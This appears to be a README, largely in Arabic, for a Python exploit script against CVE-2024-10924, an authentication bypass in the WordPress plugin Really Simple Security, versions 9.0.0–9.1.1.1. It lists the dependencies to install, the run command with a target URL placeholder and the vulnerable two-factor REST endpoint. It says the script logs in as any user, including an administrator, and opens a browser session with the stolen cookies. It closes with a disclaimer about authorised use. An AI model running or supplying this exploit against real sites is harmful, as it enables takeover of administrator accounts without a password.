
Really Simple Security (الإصدار المجاني، الاحترافي، والاحترافي متعدد المواقع) 9.0.0 - 9.1.1.1 - تجاوز المصادقة
Really Simple Security (Free وPro وPro Multisite) 9.0.0 - 9.1.1.1 - تجاوز المصادقة
يستغل هذا السكربت ثغرة في إضافة Really Simple Security (الإصدارات 9.0.0 - 9.1.1.1) الخاصة بـ WordPress. تسمح هذه الثغرة بتجاوز المصادقة بسبب معالجة غير صحيحة للأخطاء في دالة check_login_and_get_user في واجهة برمجة تطبيقات المصادقة الثنائية (Two-Factor Authentication API).
باستخدام هذا الاستغلال، يمكن للمهاجم تسجيل الدخول بصفة أي مستخدم (مثلًا، مسؤول) إذا كانت المصادقة الثنائية (2FA) مفعّلة. وبمجرد المصادقة، يقوم السكربت تلقائيًا بتشغيل جلسة متصفح باستخدام ملفات تعريف الارتباط الخاصة بالجلسة التي تم الحصول عليها.
قبل تشغيل السكربت، قم بتثبيت التبعيات المطلوبة:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/، مما يمنح وصولًا كمسؤول دون الحاجة إلى كلمة مرور.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
تم تصميم هذا السكربت للأغراض التعليمية وتقييمات الأمان المصرح بها فقط. قد يؤدي إساءة استخدام هذا السكربت إلى عواقب قانونية. احرص دائمًا على الحصول على إذن مناسب قبل الاختبار على أي نظام.